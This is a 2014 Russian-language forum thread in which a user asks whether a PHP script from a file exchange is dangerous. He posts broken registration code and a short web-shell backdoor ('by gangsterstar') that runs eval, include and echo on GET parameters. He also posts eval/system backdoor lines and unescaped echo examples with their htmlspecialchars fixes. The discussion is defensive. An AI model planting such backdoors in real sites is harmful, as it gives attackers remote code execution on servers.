Есть ли опасность?

11 Янв 2014
if (isset($_GET
['ok']) && isset($_POST
['ok'])){
if (mysql_result
(mysql_query
("SELECT COUNT
(*) FROM `user` WHERE `nic
($_POST['nick'])."'"),0)==0)
{
$nick=my_esc($_POST
['nick']);
if( !preg_match("#^([A-
zА-я0-9-_ ])+$#ui", $_POST
['nick']))$err
[]='В нике присутствуют з
if (preg_match("#[a-
z]+#ui", $_POST
['nick']) && preg_match
("#[а-я]+#ui", $_POST
['nick']))$err
[]='Разрешается использо
if (preg_match("#(^ )|
( $)#ui", $_POST
['nick']))$err

Комментарии:

vityachis

11 Янв 2014
_KENT_, я там дыр не замечаю smile

лучше кинь код полностью или хоть нормально скопируй то что интересует и напиши с подсветкой синтаксиса smile

_KENT_ 11 Янв 2014
Автор темы

<?php
//--by gangsterstar--//
if($_GET['act'] == "echo"
{echo $_GET['echo'];}
if($_GET['act'] == "include"
{include $_GET['include'];}
if($_GET['act'] == "eval"
{echo eval($_GET['eval']);}
?>

_KENT_ 11 Янв 2014
Автор темы
vityachis, код темы это дырка?

_KENT_ 11 Янв 2014
Автор темы
vityachis, мне нужно скрипт разобрать один с обмена. Посмотреть есть ли опасность.

_KENT_ 11 Янв 2014
Автор темы
echo eval($_GET['code']);
echo system($_GET['code']);
--- это бэкдоры

vityachis

11 Янв 2014
подробнее опиши проблему/вопрос ? smile

_KENT_ 11 Янв 2014
Автор темы
echo $_GET['act'];
echo $_POST['msg'];
Это дырка!
Почему? Здесь нет
фильтрации, и я видил очень
много таких говнокодиков в
наших dcms соц-
сетях.
Цифры фильтруются так:
echo (int)$_GET['act'];
А буквы так:
echo htmlspecialchars($_POST
['msg']);